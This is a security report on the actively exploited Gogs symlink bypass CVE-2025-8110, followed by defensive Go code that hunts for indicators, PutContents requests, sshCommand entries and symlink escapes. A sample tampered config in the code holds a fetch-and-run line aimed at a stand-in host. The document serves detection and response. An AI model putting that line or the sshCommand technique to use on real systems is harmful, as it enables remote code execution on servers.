
Attackers are actively exploiting a zero-day in Gogs (CVE-2025-8110), a self-hosted Git service that ships with open registration enabled by default. Researchers at Wiz report that the flaw affects Gogs versions up to and including 0.13.3 and that more than 700 of roughly 1,400 internet-exposed instances were already compromised when the issue was disclosed. Indicators on compromised hosts include an owner and repository with random 8-character names created on July 10, and payloads that use the Supershell command-and-control framework.

The vulnerability is a symlink bypass of the fix for an earlier remote code execution flaw, CVE-2024-55947. Any authenticated user who is allowed to create repositories (the default permission set) can use the PutContents API to write through a symlink and overwrite files outside the repository. Overwriting the repository's .git/config to set sshCommand turns the file write into remote code execution. Wiz found the bug accidentally while analysing malware recovered from an infected instance; the maintainers say they are "currently working on a fix," and exploitation continues in the wild. Wiz describes the attack as a trivial four-step workflow.

Until a patch ships, Wiz recommends disabling open registration, taking instances off the public internet (for example, behind a VPN), and hunting for repositories or owners with random 8-character names and for unexpected PutContents API activity. Attribution is uncertain, though Supershell has historically been used by actors operating from Asia. On the hosts where Wiz could see the malware, removing the payload was quick, but Wiz has no visibility into most compromised instances, so the scope of the intrusion and any data impact remain unknown.

Taken together, the ease of exploitation, the confirmed breadth of compromise, and the remote code execution capability raise the near-term likelihood of follow-on abuse: credential theft, lateral movement, additional persistence, and tampering with the source code these servers host. Organizations running self-hosted Git should treat this as material operational and supply-chain risk until the vendor patch is released and forensic sweeps are complete.
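The following Go program is an added example, not code from Wiz or from the Gogs project, that turns the three practical points above into checks a defender can run: the random-name indicator, the hunt for PutContents calls, a scan of bare repository configs for the sshCommand primitive, and the symlink-resolution check that a safe file-write path needs. The access-log lines and config text are constructed samples; the `/api/v1/repos/{owner}/{repo}/contents/` URL shape, the "digit or mixed case" heuristic in LooksRandom, and all function names are assumptions made here, not Wiz's indicators verbatim.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
	"regexp"
	"strings"
	"unicode"
)

// LooksRandom approximates Wiz's indicator of attacker-created owners and
// repositories: an 8-character alphanumeric name. Requiring a digit or mixed
// case is an assumption added here so ordinary 8-letter words such as
// "frontend" are not flagged. Hits are leads to review, not verdicts.
func LooksRandom(name string) bool {
	if len(name) != 8 {
		return false
	}
	var digit, upper, lower bool
	for _, r := range name {
		switch {
		case unicode.IsDigit(r):
			digit = true
		case unicode.IsUpper(r):
			upper = true
		case unicode.IsLower(r):
			lower = true
		default:
			return false // not alphanumeric
		}
	}
	return digit || (upper && lower)
}

// putContents matches a PutContents call in an HTTP access log. The endpoint
// shape is assumed; adjust the pattern to your proxy or Gogs log format.
var putContents = regexp.MustCompile(`PUT\s+/api/v1/repos/([^/\s]+)/([^/\s]+)/contents/`)

// PutContentsHits returns "owner/repo" for every PutContents request in log.
func PutContentsHits(log string) []string {
	var hits []string
	for _, line := range strings.Split(log, "\n") {
		if m := putContents.FindStringSubmatch(line); m != nil {
			hits = append(hits, m[1]+"/"+m[2])
		}
	}
	return hits
}

// sshCommand finds the config key the report names as the RCE primitive. A
// bare server-side repository never needs it, so any value is suspicious.
var sshCommand = regexp.MustCompile(`(?im)^\s*sshCommand\s*=\s*(.+)$`)

// FindSSHCommand returns the sshCommand value from a .git/config, if present.
func FindSSHCommand(config string) (string, bool) {
	m := sshCommand.FindStringSubmatch(config)
	if m == nil {
		return "", false
	}
	return strings.TrimSpace(m[1]), true
}

// EscapesRoot reports whether writing rel under root would land outside root
// once symlinks are resolved. The parent directory is resolved because the
// target file may not exist yet. A purely lexical Clean/HasPrefix check passes
// a path that goes through a symlinked directory, which is the class of
// bypass the report describes.
func EscapesRoot(root, rel string) (bool, error) {
	realRoot, err := filepath.EvalSymlinks(root)
	if err != nil {
		return false, err
	}
	target := filepath.Join(realRoot, rel)
	realDir, err := filepath.EvalSymlinks(filepath.Dir(target))
	if err != nil {
		return false, err
	}
	realTarget := filepath.Join(realDir, filepath.Base(target))
	return !strings.HasPrefix(realTarget, realRoot+string(filepath.Separator)), nil
}

func main() {
	// Constructed sample access log, not from a real incident.
	const accessLog = `GET /api/v1/repos/acme/frontend/contents/README.md 200
PUT /api/v1/repos/x7Qa9kLm/Zp3vT8wq/contents/link/config 200
PUT /api/v1/repos/acme/frontend/contents/docs/index.md 200`
	for _, hit := range PutContentsHits(accessLog) {
		owner, repo, _ := strings.Cut(hit, "/")
		fmt.Printf("PutContents on %s, random-looking names: %v\n", hit, LooksRandom(owner) || LooksRandom(repo))
	}

	// Constructed config resembling a tampered bare repository.
	const cfg = "[core]\n\tbare = true\n\tsshCommand = curl -s http://c2.example/x | sh\n"
	if cmd, ok := FindSSHCommand(cfg); ok {
		fmt.Println("sshCommand found:", cmd)
	}

	// Symlink demo: <repo>/link -> temp dir, so "link/config" leaves the repo.
	root, _ := os.MkdirTemp("", "gogs-demo")
	defer os.RemoveAll(root)
	_ = os.Symlink(os.TempDir(), filepath.Join(root, "link"))
	esc, err := EscapesRoot(root, "link/config")
	fmt.Println("escapes repository:", esc, err)
}
```

Run FindSSHCommand over every `config` file under the Gogs repository root and PutContentsHits over the reverse proxy or Gogs request logs covering the July 10 window; anything from an owner or repository that LooksRandom flags is worth a full review of that repository's history and hooks. EscapesRoot is the shape of check a file-write API needs whether or not the upstream fix takes this form.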
Investors should watch for the Gogs fix release, published indicators of compromise, and updated compromise counts as catalysts that could drive migration away from self-hosted Git, demand for incident response and managed security services, and enterprise security spending. Until the vulnerability is patched, organizations running exposed Gogs instances face higher remediation costs and possible downstream supply-chain exposure.